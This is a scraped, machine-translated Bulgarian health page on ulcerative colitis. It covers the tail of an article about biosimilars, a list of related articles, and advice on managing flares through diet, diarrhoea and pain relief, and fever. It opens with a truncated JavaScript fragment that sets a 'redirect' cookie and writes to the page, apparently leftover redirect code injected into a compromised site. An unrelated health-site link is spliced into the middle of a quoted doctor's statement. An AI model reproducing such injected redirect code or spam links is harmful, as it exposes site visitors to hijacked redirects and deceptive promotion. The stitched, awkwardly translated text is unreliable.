=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> Избягвайте и други потенциални задействания, като пикантни храни

Избягвайте и други потенциални задействания, като пикантни храни

Избягвайте и други потенциални задействания, като пикантни храни

Лесно е да си представим, казва тя, че застрахователна компания или болнична система могат просто да покрият само биоподобния еквивалент на оригинален биологичен продукт. В този измислен сценарий, тя казва, „държавата, застраховката или фармацевтът казват:„ Трябва да опитате биоподобното “, дори когато човек вече е изпитал странични ефекти от биологичното лекарство, които биха могли да се влошат с биоподобното.

Най -малкото, смята Афзали, лекарите трябва да бъдат информирани за това какво им дават пациентите. „Мисля, че като доставчик на рецепти, трябва да бъда уведомен, ако се поиска заместване“, казва тя. „Трябва също така да мога да напиша„ Разпределете както е написано “,„ за да предотвратя заместването.

От своя страна Герих прогнозира, че болниците ще станат първите широко разпространени потребители на много биоподобни лекарства - и вероятно в един момент дори изобщо няма да използват оригинални биопрепарати. Ако „имате много болен хоспитализиран пациент с улцерозен колит и трябва да му дадете голямо количество [биологично лекарство, за да предотвратите колектомия (отстраняване на дебелото черво)], това става изключително скъпо за болницата“, отбелязва той. Създаването на по -евтини биоподобни, смята Герич, може да направи управителите на аптеките по -склонни да разрешат това лечение, което означава, че повече хора потенциално биха могли да избегнат операция.

Положителната страна на биоподобните: Повече възможности за лечение на IBD

Никой не се съмнява, че биоподобните са тук, за да останат и че те ще поемат все по -голям дял от пазара на биологични лекарства през следващите години.

Афзали се надява, че притокът на нови лекарства ще накара повече изследвания за тяхното въздействие при хора с IBD. „Все още се нуждаем от много повече тестове при хора и изследвания“, казва тя, „за да оценим наистина безопасността и ефикасността на биоподобните“ за отделни заболявания.

Герих е предпазливо оптимистичен относно потенциалните ползи от биоподобните. „Да се ​​надяваме, че безопасността няма да бъде проблем“, казва той, „и ще бъде интересно да видим какви са финансовите резултати. ”

Както отбелязва Афзали, стига изборът да не се отнема от лекари и пациенти, наличието на биоподобни може да бъде само нещо добро. „Мисля, че наличието на повече възможности за лечение в нашия кабинет винаги е привлекателно“, казва тя.

Допълнителен доклад от Куин Филипс

Повече в улцерозен колит

Тест: Работи ли ви лечението на улцерозен колит?

Токсичен мегаколон и улцерозен колит

5 години с J-торбичка: Навигиране пред предизвикателствата и промените

10 неща, които трябва да знаете за биологията при улцерозен колит

Абонирайте се за нашия бюлетин за храносмилателно здраве!

Най -новото при улцерозен колит

Защо е важно хората с улцерозен колит да получат ваксина срещу COVID-19

От Брук Богдан, 26 април 2021 г.

Вашето чекиране на улцерозен колит на цялото тяло

Вземете тези тестове, за да научите дали трябва да помислите за промяна в начина, по който управлявате улцерозния колит.

До 3 март 2021 г.

Как „възрастен“ с улцерозен колит

За млади възрастни с UC преминаването от детска грижа към грижа за възрастни може да бъде особено предизвикателство.  

От Джесика Мигала 2 март 2021 г.

8 съвета за бягане за хора с UC

Използвайте този съвет, за да управлявате улцерозния колит и да поддържате текуща рутина.

От Блейк Милър, 16 декември 2020 г.

Най -добрите услуги за доставка на храна за хора с улцерозен колит

Комплектите за доставка на храна са на мода. Но когато имате UC, намирането на такъв, който да работи за вас, може да бъде предизвикателство. Ето няколко добри варианта.

От Блейк Милър, 16 декември 2020 г.

Какво трябва да знаете за телемедицината, ако имате улцерозен колит

Назначаването на виртуални лекари може да помогне на хората с колит да управляват IBD. Ето как.

От Блейк Милър, 19 ноември 2020 г.

Трябва ли да започнете диета с ниско съдържание на FODMAP, ако имате улцерозен колит?

Диета с ниско съдържание на определени въглехидрати може да помогне за облекчаване на симптомите на възпалително заболяване на червата.

От Джил Уолдбизер, 19 август 2020 г.

Най -добрите акаунти в Twitter за улцерозен колит, които да следвате

За хората с възпалително заболяване на червата, малко виртуална подкрепа може да направи дълъг път.

От Блейк Милър, 9 юни 2020 г.

Как да говорите с децата си за улцерозен колит

Ако имате деца, важно е да бъдете честни с тях относно вашия UC. Ето как да се ориентирате в разговора.

От Блейк Милър, 9 юни 2020 г.

Ново проучване свързва улцерозния колит с липсващите чревни микроби

Култивирането на колонии от семейство бактерии, наречено Ruminococcaceae, може да намали възпалението и рецидивиращия pouchitis при пациенти с UC.  

От Кейтлин Съливан, 5 март 2020 г. "

Коремната болка и диарията са два често срещани симптома на UC изблик. Одри Щециньо/Стокси

Язвеният колит, вид възпалително заболяване на червата, се характеризира с периоди на ремисия - време, когато не изпитвате никакви симптоми - последвано от пристъпи, които могат да причинят коремна болка, диария и други симптоми. Оставането на върха на лечението би трябвало да удължи времето между пристъпите, но понякога се проявяват симптоми на улцерозен колит, независимо колко внимателни сте били. Знанието какво да правите по време на пристъп ще ви помогне да се почувствате по -добре по -рано.

Управление на пристъпите на улцерозен колит: Най -важната стъпка

Ключът към овладяването на улцерозен колит е да се потвърди диагнозата и да се започне лечение възможно най -скоро. Но това може да бъде трудно, тъй като хората със състоянието могат да приписват симптомите си на други проблеми с стомашно -чревния тракт, казва Ориана Мазорра Дамас, асистент по гастроентерология в Медицинския факултет на Университета в Маями в Маями.

Целта за ремисия е да се чувствате достатъчно добре, за да забравите, че имате състояние през по -голямата част от деня; с други думи, изпитвате малко симптоми, ако има такива, обяснява д -р Дамас.

Под контрол ли са вашите симптоми на улцерозен колит?

Не винаги е лесно да се определи дали случаен пристъп на стомашна болка или диария всъщност са ранните етапи на пристъп. Вземете оценката.

Тя подчертава, че Вашият лекар вероятно ще бъде също толкова фокусиран върху това, че Вашето лечение води и до „ендоскопска ремисия“ (няма данни за възпаление при колоноскопия) и „хистологична/дълбока ремисия“ (няма данни за възпаление върху биопсичните проби колоноскопия).

„Проучванията показват, че тези, които са в ендоскопска и дълбока ремисия, се справят най-добре в дългосрочен план, доколкото са по-ниски шансовете за хоспитализации за пристъпи и по-ниски шансове за усложнения, включително операция“, казва тя.

Въпреки това, Вашият лекар ще Ви препоръча, когато усетите, че храносмилането Ви е изключено, да го разпознаете и да реагирате възможно най -бързо.

Обърнете допълнително внимание, ако сте изложени на потенциални причини за улцерозен колит. Например, някои често срещани лекарства могат да предизвикат пристъпи. Двата най-големи виновници са антибиотици и нестероидни противовъзпалителни средства (НСПВС), като ибупрофен, аспирин и напроксен. Други задействащи фактори могат да включват стрес и храни, които влошават симптомите ви в миналото.

Още съвети за облекчаване на симптомите на улцерозен колит

Най -добрият начин да съкратите пристъпа, разбира се, е да се лекувате от Вашия лекар. Но има стъпки, които можете да предприемете и у дома.

Когато имате пристъп, опитайте се да следвате диета с ниски остатъци в продължение на няколко седмици, казва Дамас. Целта е да се остави дебелото черво да почива, като се избягват влакната. Това означава да стоите далеч от семена, ядки, пресни плодове, сушени плодове, сурови зеленчуци, пълнозърнест хляб и зърнени храни и твърдо месо.

„Сега научаваме повече за влиянието, което диетата може да окаже върху контрола на възпалението“, отбелязва Дамас. „Когато пациентите имат остър пристъп, в краткосрочен план е важно да се хранят с ниско съдържание на фибри. Много пъти, за кратък период от време, докато избухването не бъде овладяно, препоръчваме това, което се нарича диета с „нисък FODMAP“. Тази диета обаче не се препоръчва дългосрочно, тъй като няма влияние върху самото възпаление и само върху контрола на симптомите. ”

Всъщност, след като сте в ремисия, Дамас казва, че Вашият лекар вероятно ще препоръча повторно въвеждане на плодове и зеленчуци като поносими. По -добре е да готвите зеленчуци без кожа и да консумирате не повече от 2 чаши мляко на ден.

Ако имате непоносимост към лактоза, не забравяйте да изберете млечни продукти без лактоза. Също така е добра идея да намалите мазнините през това време, за да предотвратите обемисти изпражнения. Избягвайте и други потенциални задействания, като пикантни храни.

„Освен това препоръчваме на https://harmoniqhealth.com/bg/ пациентите да избягват преработените храни, както и тези с високо съдържание на мазнини и животински протеини, тъй като те са свързани с възпаление в някои проучвания“, казва Дамас.

Попитайте вашия гастроентеролог за вашата диета. Някои центрове имат диетолози с персонал с опит в лечението на хора с UC. Те могат да извършват индивидуални оценки, за да ви помогнат да се храните по -здравословно.

Можете също да опитате тези съвети за облекчаване на симптомите.

За облекчаване на диария

Дамас казва, че обикновено е добре да приемате антидиарейни лекарства без рецепта, но има известна загриженост относно бактериална инфекция, наречена Clostridium difficile или C. diff, за която хората с възпалително заболяване на червата са изложени на по-висок риск.

Ако имате C. diff, антидиарейно лекарство ще забави дебелото черво и ще ви изложи на токсина за по -дълго. Тя препоръчва да се консултирате с Вашия лекар и да направите изследване на изпражненията за C. diff, преди да вземете антидиарейно лекарство.

В допълнение към диетата с ниски остатъци, може да откриете облекчение на диарията, като избягвате газирани напитки, сок от сини сливи, мляко и дъвка. Може също да откриете, че консумацията на по -малки хранения помага.

Предупредителни признаци на пристъп: При общата популация кръвта в изпражненията, придружена от диария, обикновено е причина за безпокойство, но хората, които имат улцерозен колит, почти винаги имат кръв в изпражненията си по време на пристъп, обяснява Дамас.

За облекчаване на коремните болки

Докато Вашият лекар лекува пристъпа, коремната болка трябва да се подобри. Не забравяйте да избягвате НСПВС. Дамас също препоръчва да се избягват опиоидни аналгетици (форма на лекарства с рецепта за силна болка). Вашият лекар може да Ви предпише спазмолитично лекарство, което отпуска мускулите на червата.

Предупредителни признаци на пристъп: Хората с улцерозен колит често изпитват коремна болка, но ако болката е по -лоша или забележимо различна от изходното ниво, Damas препоръчва да се обадите на Вашия лекар. За хората с улцерозен колит червените знамена, които изискват медицинска помощ, включват треска, умора и силна коремна болка.

За да вдигнете треската си

Температура над 100 ° F се счита за треска при възрастен. Изберете ацетаминофен вместо ибупрофен, аспирин или напроксен, за да понижите температурата си, и не забравяйте да пиете много течности.

Предупредителни признаци на пристъп: Възрастен с температура от 104 ° F или по -висока трябва незабавно да се обади на лекаря. Обадете се и ако треската ви продължава да се покачва или продължава повече от два или три дни.

Когато имате улцерозен колит, естествено е да преминете през периоди на пристъпи и ремисия, дори когато правите всичко правилно. Ако имате няколко пристъпи, които изискват стероиди, за да овладеете симптомите, може да е време да преоцените лечението си, отбелязва Дамас. Добрата комуникация с Вашия лекар ще осигури най -ефективното облекчаване на пристъпите.

„Ако имате увеличаване на симптомите, включително засилено ректално кървене, увеличено подуване на корема, увеличени коремни спазми или болка, чувство, че трябва да отидете до тоалетната, но не можете, неволна загуба на тегло или повишена умора, това може да предполага че сегашното Ви лечение губи отговор “, казва Дамас. „Винаги говорете с вашия гастроентеролог за вашите симптоми [вместо] да променяте нещо сами. ”